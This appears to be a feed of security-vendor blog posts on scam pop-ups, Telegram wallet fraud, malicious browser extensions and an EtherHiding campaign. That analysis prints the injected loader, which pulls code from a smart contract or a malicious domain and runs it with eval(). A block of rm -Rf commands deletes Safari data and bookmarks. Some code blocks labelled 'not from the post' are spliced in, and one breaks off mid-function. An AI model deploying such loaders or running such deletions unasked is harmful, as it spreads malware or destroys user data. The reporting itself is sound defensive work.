Online Security Archives – Gridinsoft Blog. Welcome to the Gridinsoft Blog, where we share posts about security solutions to keep you, your family and business safe. Tue, 10 Sep 2024 17:21:16 +0000 en-US

Fake Virus Alert https://gridinsoft.com/blogs/fake-virus-alert-how-to-get-rid/ Tue, 10 Sep 2024 10:36:52 +0000

Fake virus alerts are a nuisance; if you’re not careful, they can lead to a real malware infection. Scammers create fake virus pop-ups to deceive victims into clicking on the false virus warnings and inadvertently installing malware. So first, learn the telltale signs of a fake virus alert and how to deal with it.

What is a fake virus alert?

Fake Virus Alert From Microsoft Defender

A fake virus alert is a notification whose only task is to mislead the user. It usually appears in the browser, but it can also show up as a system notification. Such alerts can be caused by rogue antivirus software, adware, or a simple website redirection.

Fake Virus Alert From McAfee

Rogue antivirus is fraudulent security software that misleads users into believing there is a virus on their computer. Its aim is to convince them to pay for a fake malware removal tool, which then blocks legitimate, safe apps it finds on the system.

Fake security threats often appear on your screen as browser pop-ups claiming that your computer is infected with a deadly virus. Such pop-ups are themselves a signal that you have adware on your device. The warnings direct you to download a purported virus removal tool, which may well be the rogue antivirus described above.

Example of a rogue antivirus fake virus alert

Redirections appear when you click through some less than trustworthy pages. Compromised sites, or sites whose administrators do not care who they refer visitors to, may contain several such malicious links. A fake alert reached this way is not a sign of malware on your device; unfortunately, fake virus notifications with such a harmless cause are quite rare.

In most instances they serve malicious purposes, typically by pushing a browser extension. Spreading such extensions is easy, which makes them attractive to crooks. The usual lure is an advertising page that demands you “install a plugin to confirm that you are not a robot” or presents itself as “a security advisory”. These extensions have become a popular infection method, as they are embedded in the browser and are often ignored by weak antivirus products. In addition, they are aimed at stealing user data, of which the browser holds plenty.

Signs of fake virus alerts

Virus alerts can be convincing, but there are a few telltale signs that they’re fake. Understanding these signs can help you avoid phony pop-up alerts and stop you from clicking on dangerous links. Generally, trust your instincts: if something seems off, it probably is. These signs indicate that a virus alert is fake:

  • Fake-sounding products: Fake virus warnings are typically straightforward. They often promote fraudulent products. Learning about reputable antivirus software will make it simple to recognize fraudulent products.
  • High-frequency alerts: The sudden increase in warnings about the virus is alarming. However, this is a common tactic used by adware. The goal is to make you anxious enough to download their fraudulent product.
  • Bad grammar: A legitimate corporation takes time to refine its messaging and communications. Fake virus software scams will often have spelling and grammar errors and also apply strange text designs – like numerous “#” or “_” symbols across the text.
  • Vague wording: Unclear promises or vague descriptions are suspect. Reputable antivirus software will use straightforward language to describe its product and benefits.

The list of signs is not complete, as crooks have proven inventive enough to keep finding new ideas for their banners. Most of the time, however, one or several of the signs named above will appear, and that should raise your suspicion.

Examples of fake virus alerts

A fake virus alert can have multiple forms. Understanding the following examples of virus warnings can assist you in recognizing scams before they have a chance to cause harm. These are some examples:

1. Malvertisements

Malvertising is the deceptive use of legitimate advertising networks by hackers to place infected ads on websites you trust. These ads often claim your computer is infected with a virus and attempt to sell bogus antivirus programs. Treat any web notification that claims your computer is infected with suspicion: only alerts from the security software you actually installed deserve attention.

Example of malvertisements

2. Fake versions of real ads

Scammers also produce counterfeit versions of ads from reputable businesses. These fakes use dubious claims and exaggerated, fear-laden language, and they offer absurdly favorable terms.

3. System tray notifications

Compared to common fake virus warnings, system tray notifications are rare. They appear as notifications in your system tray and inform you of a serious infection that requires immediate attention. They are more effective because they look more authentic. When you see one, make sure it’s not a fake before you choose to respond. By examining the language of the alert, you can determine whether it’s real or fake. Fraudulent messages use emotional wording to manipulate you into rash decisions. They also typically have formatting issues or fonts that don’t match.

How to remove a fake virus alert?

Step 1. Remove push notifications

If you encounter a fake virus alert, the first step is to shut down your browser. A key combination like Alt+F4 or Command+Q (on macOS) will do the job. If this is not possible because the browser is unresponsive, force-close it from the operating system (Task Manager on Windows, Force Quit on macOS). This prevents you from clicking on the infected pop-up, which could lead to further problems. Then open the browser again to start troubleshooting.

If you subscribe to push notifications from scam sites, you can remove them through the browser interface. Go to your browser settings, find notification settings and remove all the sites that are listed as ones that can send notifications. Reload the browser to apply the changes.
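The browser interface shows the same list one site at a time; an added example (not from the post) of auditing it in bulk from a Chrome/Chromium profile follows. It assumes the Chromium “Preferences” JSON layout, where per-site permissions live under profile.content_settings.exceptions.notifications, keyed by an origin pattern such as "https://example.com:443,*" with "setting" 1 meaning allow and 2 meaning block; the sample data is constructed, and the profile paths in the comments are the usual defaults, not taken from the post.

```python
"""Audit which sites a Chrome/Chromium profile allows to send push notifications.

Added example (not from the post). It assumes the Chromium "Preferences" JSON
layout: per-site permissions live under
profile.content_settings.exceptions.notifications, keyed by an origin pattern
such as "https://example.com:443,*" with "setting" 1 = allow, 2 = block.
Verify this against your own profile before relying on it.
"""
import json
from pathlib import Path

ALLOW = 1   # CONTENT_SETTING_ALLOW (assumed numeric value)
BLOCK = 2   # CONTENT_SETTING_BLOCK (assumed numeric value)

# Constructed sample of the relevant slice of a Preferences file.
SAMPLE_PREFERENCES = json.dumps({
    "profile": {
        "content_settings": {
            "exceptions": {
                "notifications": {
                    "https://mail.example.com:443,*": {"setting": ALLOW},
                    "https://news-alerts-example.xyz:443,*": {"setting": ALLOW},
                    "https://shop.example.org:443,*": {"setting": BLOCK},
                }
            }
        }
    }
})


def load_notification_exceptions(prefs_text):
    """Return {origin_pattern: setting} from Preferences JSON text ({} if absent)."""
    node = json.loads(prefs_text)
    for key in ("profile", "content_settings", "exceptions", "notifications"):
        node = node.get(key, {})
    return {pattern: entry.get("setting") for pattern, entry in node.items()}


def origin_of(pattern):
    """Drop the ',*' secondary-pattern suffix and an explicit default :443 port."""
    origin = pattern.split(",", 1)[0]
    if origin.startswith("https://") and origin.endswith(":443"):
        origin = origin[: -len(":443")]
    return origin


def allowed_notification_sites(prefs_text, expected=()):
    """Return sorted [(origin, is_expected)] for every site allowed to push notifications.

    Anything not in the caller's allowlist `expected` is what you would review
    and revoke in the browser's notification settings.
    """
    expected = set(expected)
    result = []
    for pattern, setting in load_notification_exceptions(prefs_text).items():
        if setting != ALLOW:
            continue
        origin = origin_of(pattern)
        result.append((origin, origin in expected))
    return sorted(result)


def audit_profile(preferences_path, expected=()):
    """Run the same audit against a real profile; close the browser first so the file is stable.

    Typical locations (assumed defaults):
      Windows: %LOCALAPPDATA%\\Google\\Chrome\\User Data\\Default\\Preferences
      macOS:   ~/Library/Application Support/Google/Chrome/Default/Preferences
      Linux:   ~/.config/google-chrome/Default/Preferences
    """
    text = Path(preferences_path).read_text(encoding="utf-8")
    return allowed_notification_sites(text, expected)


if __name__ == "__main__":
    for origin, ok in allowed_notification_sites(SAMPLE_PREFERENCES, {"https://mail.example.com"}):
        print(("expected  " if ok else "REVIEW    ") + origin)
```

On the constructed sample the script lists the mail site as expected and flags the news-alerts site for review; the blocked shop site is not listed at all, since a block entry is exactly the state you want. Revoking is still done in the browser’s own notification settings, as the step above describes.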

Step 2. Remove any suspicious extensions.

An extension is a small application that enhances the functionality of the browser. Remove any you do not recognize or did not install deliberately.


Google Chrome

  1. Launch the Chrome browser.
  2. Click on the icon “Configure and Manage Google Chrome” ⇢ Additional Tools ⇢ Extensions.
  3. Click “Remove” next to the extension.

If you have an extension button on the browser toolbar, right-click it and select Remove from Chrome.

Mozilla Firefox

  1. Click the menu button, select Add-ons and Themes, and then click Extensions.
  2. Scroll through the extensions.
  3. Click on the … (three dots) icon for the extension you want to delete and select Delete.

Step 3. Reset browser settings

Resetting your browser settings is one of the first things you should do to eliminate the Windows Defender security warning scam. The following instructions tell you how to do this in different browsers:


Google Chrome

  1. Click the three vertical dots in the top right corner and choose Settings.
  2. Choose Reset and Clean up, then Restore settings to their original defaults.
  3. Click Reset settings.

Mozilla Firefox

  1. In the upper right corner, click the three-line icon and choose Help.
  2. Choose More Troubleshooting Information.
  3. Choose Refresh Firefox…, then Refresh Firefox.

Microsoft Edge

  1. Click the three dots in the top right corner.
  2. Choose Settings.
  3. Click Reset Settings, then click Restore settings to their default values.

Step 4. Remove suspicious apps

Find and remove the suspicious app: go to Settings and open the ‘Apps’ section. Look for the list of installed apps (you may need to select ‘App manager’ for the complete list) and locate the malicious app. Open the app’s information page and select the option to uninstall. This should eliminate the suspicious app.

If you can’t find the suspicious program in the list of all programs on your device, scan the device with an antivirus. If the app is listed but cannot be uninstalled, it may have been granted device administrator rights, and you must revoke them first. To do this, go to your security settings and find the section titled “Device Admin Apps”. Uncheck the app you want to remove and confirm the deactivation. You should now be able to delete the app.

Step 5. Scan your PC for viruses

If you examine your computer and can’t find any suspicious files, consider installing antivirus software if you don’t already have it. You can use it to search for malware that may be concealed on your computer. If the scan identifies a threat, the software can attempt to remove it and prevent further damage to your device.

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Removal finished

New Telegram Scam Mimics Digital Wallets, Promotes Shady Apps https://gridinsoft.com/blogs/new-telegram-scam-digital-wallets/ Wed, 24 Jul 2024 22:55:37 +0000

A new Telegram scam has emerged that leverages the application’s bot functionality to offer fake earning schemes. Scammers impersonate the official bots of popular digital wallet brands, tricking users into investing their money in non-existent ventures. Eventually, they simply cut off all communication, leaving users with no money and none of the promised returns.

Telegram Bots Mimic Digital Wallet Brands, Promote Questionable Apps

Recent research reveals a new scam scheme that combines Telegram bots and fake earning schemes. Scammers create Telegram bots that pose as the official bot of a specific digital wallet and offer easy earnings for completing tasks. Victims are asked to register in a referral system, provide access to their digital wallet, and perform simple tasks. These usually involve installing a strange app from an APK file, playing some odd games, watching ads, and so on. Additionally, the scammers actively encourage victims to share the scheme with friends and family, promising generous rewards for each referred friend.

Telegram bot screenshot

This scam mainly spreads through social media, comments under videos on related topics, and fake communities. At the moment it is a local threat targeting Indonesian users. However, there is a good chance it will eventually spread to other countries, as the scheme is extremely easy to replicate. Initially, the fraudsters may allow the victim to withdraw funds, mostly at the very beginning and only in small sums. This is done to lull the victim into a false sense of security and to convince them that investing is safe. After investing, the victim is asked to perform the tasks for which they are promised rewards. Ultimately, however, the scammers obtain the victim’s confidential information, funds and wallet data.

How Does This Scam Work?

The entire scam process can be roughly divided into stages. The first stage is gathering an audience, which aims to attract potential victims. Scammers use social media platforms like Facebook and TikTok for this purpose. Often, a link to the Telegram bot is placed under themed videos on TikTok, such as those about the Hamster Combat tap game. More promotion channels may appear later, including ones within Telegram itself.

Comments on TikTok

Retaining The Victim

The next stage is pushing the victim into continuous participation in the scam. As mentioned earlier, the fraudsters use Telegram bots that impersonate well-known digital wallet brands. The core of the scheme is built on two things: completing tasks and bringing in new people through referral links. Through the bot’s messages, they motivate the user to recruit as many new users as possible and to do the tasks in order to increase the reward.

Moreover, there are specific minimum requirements that, if not met, leave the user without any reward. For example, the user receives 10,000 Indonesian Rupiah (~62¢) for each referred friend. However, the minimum number of referred users is 15, and the minimum withdrawal amount is 100,000 Indonesian Rupiah (~$6.15). Also, the victim should be subscribed to the Telegram channel led by scammers, otherwise they will not be rewarded at all.

Main Act of the Fraud

Once the victim is hooked, the bot starts sending them tasks: installing certain programs from shady websites (as .APK files), browsing pages that look like phishing sites, and watching ads. There were legitimate earning schemes in the past that paid for such actions, so at a glance this does not look like a complete rip-off. Nonetheless, those older schemes never involved installing gambling apps or dodgy games that collect a lot of user data, let alone visiting phishing websites.

Eventually, as the reward approaches the withdrawal threshold, the bot simply stops communicating with the victim. At first, tasks arrive less and less often, and at some point you will only see the message “no tasks available”. This is, in fact, the culmination of the scam.

Fake Community

To enhance their credibility, scammers have created groups on Telegram and WhatsApp where they post news and interact with users. Often, to join such a group, the victim must make an initial deposit. However, in some cases, scammers may add an interested user without requiring a deposit. In these groups, more experienced “investors” share stories and screenshots of their “earnings,” thereby increasing the trust of new victims.

Despite these Telegram bots and communities associating themselves with well-known wallets, they obviously have no real connection to them. As a result, after some time, users are left with nothing. When they attempt to withdraw funds, they are directed to customer support, which promises that everything will be done soon. Additionally, besides losing money, victims provide scammers with confidential information that can later be reused in other scams.

A less obvious side of this fraud is the outcome of installing shady APK files. While Google Play is not the most reliable app source, it will still stop the most blatant malware. But when you side-load an APK file, all checks are up to you. And that is the main problem here: victims are simply blinded by the rewards, and consequently pay no attention to what they install. This may, and will, result in data loss and identity theft.

Why Is This So Popular?

Although similar scams have existed before, they are currently experiencing a significant boom. There are several reasons, including widespread digitalization and the popularity of digital assets and tokens. For example, apps like “Hamster Combat” and similar ones attract users who are eager for easy earnings. Scammers exploit this trend by creating fake referral programs and investment schemes to lure users and gain access to their funds.

The second reason is the lack of sufficient moderation on social media platforms. As mentioned earlier, the primary source of this scam is social networks, where the audience is often not technically savvy. Consequently, users frequently encounter ads and comments containing links to fraudulent websites and apps. Although artificial intelligence is increasingly being used in moderation processes, scammers also use AI to bypass these measures. As a result, naive users fall victim to this arms race.

Browser Extensions: Are They Safe? https://gridinsoft.com/blogs/browser-extensions-are-they-safe/ Sun, 07 Jul 2024 13:57:36 +0000

Browser extensions are convenient little utilities that adjust the browsing experience and make it more comfortable for you personally. However, such a convenient shell, an applet running inside a legitimate program, could not have been ignored by malicious actors. In this post, I will cover malicious browser extensions, their nature and their potential harm.

Can extensions be malicious?

Yes, extensions can be malicious, but the harm they can cause is quite specific. In terms of severity, a browser extension is not on par with full-fledged malware. Since extensions cannot go beyond the environment of a browser, they cannot infect the system, modify or delete system files, or directly manipulate the operating system (except for cases with vulnerabilities). However, some extensions can collect personal data, such as browsing history, passwords, and other confidential information, and transmit it to third parties without your consent. This makes them close to spyware and infostealers.

Depending on the type of extension, they act differently and thus have distinct malicious potential. For example, some open pop-up ads, redirect users to phishing sites, or inject ads into websites where none were present. Some extensions contain malicious code that can initiate the download of other malicious programs. They can also change your browser settings without your knowledge, altering your homepage or search engine.

It is worth noting that a malicious browser extension is a rare find these days, as long as you source extensions from official stores. Browser extensions are usually distributed through extension stores, platforms with moderation and requirements, although these are not always effective at stopping malicious software. Should the store’s systems detect malicious activity or receive well-founded reports of malignant behavior, the extension’s listing will be taken down.

The main ways dodgy extensions spread lie far from the common routes of the Internet. Usually, they arrive via a redirection from a shady website that sells its traffic to random traffic brokers. Upon redirection, the user sees an offer to install a “recommended extension”, supposedly to enhance security or to display the content. Sure enough, neither actually happens after the installation.

Useless browser extension trying to install.

Browser Hijacker

A browser hijacker is perhaps the most common type of malicious extension. Once installed, this extension changes your homepage and search engine. Even if the user navigates to google.com and performs a search, the extension redirects the query to its search engine. It also adds a special token to each search query, which modifies the search results. In the end, instead of relevant results, the user receives sponsored links that may not even match the query.

The primary risk of such extensions lies in the collection of personal information. The redirection that happens in the process throws the user through a selection of data broker sites, and each of them gathers whatever data they want. Aforementioned alteration of search results can casually throw the user to a phishing page. In some cases, this can result in the download of malicious software.

Adware

Adware extensions, as the name suggests, add advertisements to all the websites a user visits. Typically, these extensions disguise themselves as something useful or basic, such as tools for finding discounts and promo codes. Notably, similar functionality is already built into Microsoft Edge. In practice, these extensions are useless; instead, they bombard the user with ads. Since adware does nothing beyond the actions just described, many malicious browser extensions are simply adware specimens.

The typical result of an adware extension’s activity is hard to ignore. The browser starts to run slowly, and clicking on any element of a page opens multiple tabs with ads, some of which may be malicious. Certain sites can automatically initiate the download of malicious software. Overall, such an extension can seriously degrade the user experience and pose a threat to privacy.

Fake Cryptocurrency Wallet Extension

Fake cryptocurrency wallet extensions pose as legitimate crypto wallets, but their goal is to steal users’ credentials and funds. As I mentioned earlier, moderation in app stores is far from perfect, and sometimes malicious actors manage to place harmful extensions in official extension stores. These extensions may be disguised as popular wallets but have no actual affiliation with them.

When a user enters their credentials, such as private keys, mnemonic phrases, or passwords, the extension transmits this information to the malicious actors. This info allows the attackers to access the user’s real cryptocurrency wallets. Once they have access to the account, the attackers can transfer the funds to their accounts, leading to a complete loss of cryptocurrency for the user.

How to Stay Safe?

Malicious browser extensions are a threat whose dangers you should not underestimate. I have a few recommendations that can help you minimize the risks associated with them. Firstly, avoid installing unnecessary extensions. I would recommend avoiding extensions from unverified sources altogether.

While most of us tend to click “next” to speed up the installation process when installing an extension from a store, I suggest paying attention to the developer and reading the reviews. Keep an eye on your installed extensions and promptly remove any that are unnecessary. Pay special attention when installing extensions related to cryptocurrency wallets. And finally, consider using decent anti-malware software that will notify you about the malicious activity that comes from such an extension.
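Keeping an eye on installed extensions is easier with a quick permissions triage. The following is an added example, not code from the post or from Gridinsoft, that reads extension manifests (Chromium keeps them at <profile>/Extensions/<id>/<version>/manifest.json, an assumed layout) and flags the traits described above: running on every site, access to sensitive browser APIs, overriding the homepage or default search engine (the browser hijacker pattern), and a missing update_url, which store-installed extensions normally carry. The two manifests below are constructed samples.

```python
"""Triage browser extensions by the permissions their manifest requests.

Added example (not from the post). Assumes the Chromium on-disk layout
<profile>/Extensions/<id>/<version>/manifest.json and manifest v2/v3 fields.
"""
import json
from pathlib import Path

# Host patterns that grant access to every page the user visits.
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
# APIs that let an extension read or rewrite traffic, history, cookies, etc.
SENSITIVE_APIS = {
    "webRequest", "webRequestBlocking", "declarativeNetRequest", "tabs",
    "history", "cookies", "clipboardRead", "nativeMessaging", "proxy",
    "management", "scripting", "debugger",
}

# Constructed sample: a hijacker-style extension installed outside a store.
HIJACKER_MANIFEST = {
    "manifest_version": 3,
    "name": "Search Booster (constructed sample)",
    "permissions": ["tabs", "webRequest", "storage"],
    "host_permissions": ["<all_urls>"],
    "chrome_settings_overrides": {
        "search_provider": {"name": "Boosted Search", "search_url": "https://search.example/?q={searchTerms}"},
        "homepage": "https://start.example/",
    },
}

# Constructed sample: a benign store extension with minimal permissions.
BENIGN_MANIFEST = {
    "manifest_version": 3,
    "name": "Notes (constructed sample)",
    "permissions": ["storage"],
    "host_permissions": [],
    "update_url": "https://clients2.google.com/service/update2/crx",
}


def host_patterns(manifest):
    """Collect every host pattern the extension may run on (v2 and v3 layouts)."""
    hosts = set()
    if manifest.get("manifest_version", 2) >= 3:
        hosts.update(manifest.get("host_permissions", []))
    else:  # manifest v2 mixed host patterns into "permissions"
        hosts.update(p for p in manifest.get("permissions", [])
                     if "://" in p or p == "<all_urls>")
    for script in manifest.get("content_scripts", []):
        hosts.update(script.get("matches", []))
    return hosts


def assess(manifest):
    """Return a list of human-readable risk flags; an empty list means nothing stood out."""
    flags = []
    if host_patterns(manifest) & BROAD_HOSTS:
        flags.append("runs on every site")
    apis = set(manifest.get("permissions", [])) & SENSITIVE_APIS
    if apis:
        flags.append("sensitive APIs: " + ", ".join(sorted(apis)))
    overrides = manifest.get("chrome_settings_overrides", {})
    if overrides.get("search_provider"):
        flags.append("overrides the default search engine")
    if overrides.get("homepage"):
        flags.append("overrides the homepage")
    if not manifest.get("update_url"):
        flags.append("no update_url (not installed from a store)")
    return flags


def scan_profile(profile_dir):
    """Assess every extension under <profile>/Extensions; returns {id: (name, flags)}."""
    report = {}
    for manifest_path in Path(profile_dir, "Extensions").glob("*/*/manifest.json"):
        manifest = json.loads(manifest_path.read_text(encoding="utf-8"))
        ext_id = manifest_path.parents[1].name
        # Store extensions often localize the name as "__MSG_xxx__"; shown as-is.
        report[ext_id] = (manifest.get("name", "?"), assess(manifest))
    return report


if __name__ == "__main__":
    for manifest in (HIJACKER_MANIFEST, BENIGN_MANIFEST):
        print(manifest["name"], "->", assess(manifest) or ["no flags"])
```

A flag is a reason to look closer, not proof of malice: a legitimate ad blocker also needs broad host access and webRequest. The combination of a search or homepage override with a missing update_url is, however, exactly the profile of the browser hijackers described earlier and is worth removing on sight.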

Windows Defender Security Warning https://gridinsoft.com/blogs/windows-defender-security-warning-scam-how-to-remove/ Tue, 02 Jul 2024 09:14:36 +0000

Have you ever encountered a Windows Defender security warning pop-up while browsing? This type of malicious activity is designed to trick you into contacting scammers. Fortunately, you can quickly get rid of it. Here, we will explain how to remove this scam and protect yourself from other viruses.

What is the Windows Defender Security Warning?

This warning is the result of scareware or a phishing scam. Its purpose is to redirect you to a webpage that visually resembles the official Microsoft website. However, the URL does not match the official site. The page may display a message claiming that your computer is infected with malware and that you need to contact a support agent by phone to fix the problem.

Windows Defender Security Warning scam example. Red flags are highlighted in the picture.

Unfortunately, the notification looks like a legitimate Windows message, which makes it especially dangerous: many users will not even attempt to verify it with a web search. Scammers make the pop-up as convincing as possible so that people don’t suspect anything is wrong. The phone number provided will likely connect you to a fraudulent call center. The agent may try to get you to install malware, steal your personal information, or demand money for fake services.

Why is the Windows Defender Security Warning False?

At first glance, you might mistake this for a legitimate warning from Windows Defender. However, if you’re familiar with Windows Defender, you’ll notice differences from a genuine notification. Therefore, please do not call the phone number provided in the window because it is not a real alert. Here’s why:

  • It’s not the Windows Defender interface. Windows Defender, also known as Windows Security, is a built-in Windows application with a different interface. It will never display a browser pop-up or webpage; it uses system notifications instead.
  • Strange text and typos. A banner or page showing a Microsoft Defender alert often contains strange text designs and grammatical and stylistic errors, which sharply contrast with the short and informative Defender notifications.
  • Microsoft never provides contact numbers for users. Users can contact Microsoft support through the “Get Help” application if they encounter problems.

This Windows Defender security alert is flawed in both format and content. It’s often a low-level phishing scam aiming to sell a rogue antivirus service, which can harm your computer. In some cases, you might not be able to close the alert or switch to other applications.

Causes of the Windows Defender Security Warning

There are several reasons why you might see a Windows Defender security warning. Here are the most common ones:

  • You clicked on an ad that redirected you to a fake site.
  • You visited a hacked website that redirected you to a fraudulent page.
  • You have a malicious program installed on your device, often a result of adware activity.

There are also many other ways you could be exposed to fraud, depending on various factors, such as the external devices you share with others. Simply closing the window may not solve the problem, especially if adware is causing it. The pop-up message may appear every time you open your browser.

How to Remove the Windows Defender Security Warning

Since the Windows Defender security warning appears in your browser, most actions to get rid of it are related to your browser. These steps can help resolve the issue of Windows Defender security warning pop-ups:

  • Force close and reopen your browser.
  • If the problem with redirecting to a fraudulent page persists, reset your browser (instructions below) or reinstall the browser completely.
  • If this continues, you may have adware or a PUP (potentially unwanted program) installed on your computer, and you need to remove it.

If you’re unsure which installed application is causing the pop-up notifications, install antivirus software to detect and remove the infection from your computer.

How to Clear the Browser from the Windows Defender Security Warning

Resetting your browser settings is one of the first steps to eliminate the Windows Defender security warning scam. Here are the instructions for different browsers:

Remove the Windows Defender Scam from Chrome

  1. Click the three vertical dots in the top right corner and select Settings.
  2. Select Reset and Clean up, then Restore settings to their original defaults.
  3. Click Reset settings.

Remove the Windows Defender Scam from Firefox

  1. Click the three-line icon in the upper right corner and select Help.
  2. Select More Troubleshooting Information.
  3. Select Refresh Firefox…, then Refresh Firefox.

Remove the Windows Defender Scam from Microsoft Edge

  1. Click the three dots in the top right corner.
  2. Select Settings.
  3. Click Reset Settings, then click Restore settings to their default values.
Remove the Windows Defender Scam from Safari

  1. Open the Terminal (press ⌘ Command + Spacebar to open Spotlight, type “terminal” and press Enter).
  2. Enter the commands below one at a time, pressing Enter after pasting each one into the Terminal. Note that these commands wipe Safari’s caches, preferences, saved state and bookmarks (Bookmarks.plist is among the files removed), so export anything you want to keep first:

     rm -Rf ~/Library/Caches/Metadata/Safari;
     rm -Rf ~/Library/Caches/com.apple.Safari;
     rm -Rf ~/Library/Caches/com.apple.WebKit.PluginProcess;
     rm -Rf ~/Library/Preferences/Apple\ -\ Safari\ -\ Safari\ Extensions\ Gallery;
     rm -Rf ~/Library/Preferences/com.apple.Safari.LSSharedFileList.plist;
     rm -Rf ~/Library/Preferences/com.apple.Safari.RSS.plist;
     rm -Rf ~/Library/Preferences/com.apple.Safari.plist;
     rm -Rf ~/Library/Preferences/com.apple.WebFoundation.plist;
     rm -Rf ~/Library/Preferences/com.apple.WebKit.PluginHost.plist;
     rm -Rf ~/Library/Preferences/com.apple.WebKit.PluginProcess.plist;
     rm -Rf ~/Library/PubSub/Database;
     rm -Rf ~/Library/Safari/*;
     rm -Rf ~/Library/Safari/Bookmarks.plist;
     rm -Rf ~/Library/Saved\ Application\ State/com.apple.Safari.savedState;
    What to Do if the Problem Persists?

    If you have followed all the steps above and still see this warning every time you use a web browser, it is a clear sign that malware is still present on your computer. Use professional antimalware software such as GridinSoft Anti-Malware to scan your computer and remove any viruses or malware it finds. Beyond the scam itself, such a scan will also remove and neutralize more dangerous cyber threats that could cause severe damage to your files.

    GridinSoft Anti-Malware main screen

    Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

    After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

    Scan results screen

    Click "Clean Now" to start the removal process. Important: the removal process may take several minutes when there are a lot of detections. Do not interrupt it, and you will get your system as clean as new.

    Removal finished

    How to Avoid Scams like the Windows Defender Security Warning

    As mentioned earlier, the Windows Defender security warning scam is not the only threat you may encounter on your computer. There is far more severe malware on the Internet, and as a prudent user, you should take every precaution to avoid it. Here are some basic tips:

    • Ensure your OS and apps are up to date
    • Only download apps from official websites
    • Avoid clicking on random links without knowing where they will take you
    • Don’t download suspicious apps
    • Do not open attachments in suspicious emails
    • Use an ad blocker to block malicious ads
    • Use advanced antivirus software

    Your computer should now be clean and free of Windows Defender scams. To prevent this from happening again, practice good online hygiene to protect yourself from fraud. Perform regular scans and use malware protection to stop threats before they happen.

    Binance Smart Contracts Blockchain Abused in Malware Spreading

    Gridinsoft Blog, Tue, 25 Jun 2024. URL: https://gridinsoft.com/blogs/binance-smart-contracts-abused-malware-spreading/

    Cybercriminals appear to exploit Binance smart contracts as an intermediary C2, preferring them over classic hosting because they are nearly impossible to take down. The technique is currently used to deploy infostealers, but it can be applied to practically any malware.

    Cybercriminals Use BSCs As C2 Infrastructure

    A new technique, coined EtherHiding, was described over half a year ago, in October 2023. Analysts noticed a shift in the networking patterns of a now-old scheme that tricks users into installing malware disguised as browser updates. Instead of pulling the malicious code from Cloudflare Workers, the compromised sites now direct their requests to smart contracts on Binance Smart Chain.

    Smart contracts, in essence, are pieces of code that execute when certain conditions are met; in this case, when a correct request is sent. This makes them similar to Cloudflare Workers, which effectively allowed fraudsters to use genuine Cloudflare servers to host malicious code delivery. The difference is that smart contracts live on a blockchain, which makes them nearly impossible to take down. This is probably why cybercriminals started paying them so much attention, aside from the fact that these contracts are dirt cheap. But more on that later.

    How Does Malware Spread via Binance Smart Contracts?

    The attack chain begins with compromising a website; hackers usually target WordPress sites, due to the numerous vulnerabilities in WordPress itself and in popular plugins. After compromising the website, hackers plant a script that communicates with the Binance Smart Chain API:

    async function load() {
      let provider = new ethers.providers.JsonRpcProvider("https://bsc-dataseed1.binance.org/"),
          signer = provider.getSigner(),
          address = "0x7f36D9292e7c70A204faCC2d255475A861487c60",
          ABI = [
            { inputs: [{ internalType: "string", .......},
            { inputs: [], name: "get", ......},
            { inputs: [], name: "link", ....... },
          ],
          contract = new ethers.Contract(address, ABI, provider),
          link = await contract.get();
      eval(atob(link));
    }
    window.onload = load;

    Alongside these steps, attackers create a new smart contract and add the malicious code to it through the contract’s update function. This locks the entire scheme in the “ready-to-fire” position.

    BSC malware delivery scheme

    When a user enters the compromised site, the script triggers the mechanism: the page sends a get() request to the associated smart contract. The response is an encoded script string; the page decodes it with atob() and runs it through eval(), so the user’s browser executes code that never came from the site itself. This is what defaces the website and causes the “update browser” banner to appear.

    Experienced users may sense something fishy, as browsers never ask for an update in such a manner, but the majority of people will take it for granted. Clicking the “Update …” button on that image executes the script grabbed from the smart contract and downloads the final payload. Cybercriminals typically use a bunch of one-day websites that return the payload. At the moment, malware like Lumma Stealer, RedLine and Vidar use this scheme the most.

    const get_k_script = () => {
      let e = new XMLHttpRequest();
      return e.open("GET", "https://921hapudyqwdvy[.]com/vvmd54/", !1), e.send(null), e.responseText;
    };
    eval(get_k_script());
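The two snippets above share one shape: fetch something from somewhere the site owner does not control, then hand it to eval(). As an added example (this is not code from the article, from Gridinsoft, or from the campaign), the following JavaScript triages a page’s inline scripts for exactly those indicators: a Binance Smart Chain RPC endpoint or ethers.js contract binding combined with eval(), or a synchronous XMLHttpRequest combined with eval(). The sample page, the all-zero contract address and the host payload.example are constructed for the demonstration.

```javascript
// Added example for this article, not code from Gridinsoft or from the campaign:
// a static scanner that flags inline scripts carrying the two loader patterns
// shown above (contract read + eval(atob()) and synchronous XHR + eval()).
// The sample page, the zero address and the host "payload.example" are constructed.

const INDICATORS = [
  { id: "bsc-rpc",  re: /bsc-dataseed\d*\.binance\.org/i,  note: "Binance Smart Chain JSON-RPC endpoint" },
  { id: "contract", re: /new\s+ethers\.Contract\s*\(/,      note: "ethers.js contract binding" },
  { id: "sync-xhr", re: /\.open\s*\(\s*["']GET["']\s*,[^)]*,\s*(?:!1|false)\s*\)/, note: "synchronous XMLHttpRequest" },
  { id: "eval",     re: /\beval\s*\(/,                      note: "eval() of dynamic content" },
  { id: "atob",     re: /\batob\s*\(/,                      note: "base64 decoding before execution" },
];

// Pull the body of every inline <script> out of a page (good enough for a triage tool).
function extractScripts(html) {
  const bodies = [];
  const re = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(html)) !== null) bodies.push(m[1]);
  return bodies;
}

// Match indicators and combine them into a verdict: a script is only called a
// loader when it both fetches remote content and executes it.
function scanScript(code) {
  const hits = INDICATORS.filter(i => i.re.test(code)).map(i => i.id);
  const has = id => hits.includes(id);
  const fromChain = has("bsc-rpc") || has("contract");
  let verdict = "clean";
  if (has("eval") && fromChain) verdict = "etherhiding-loader";
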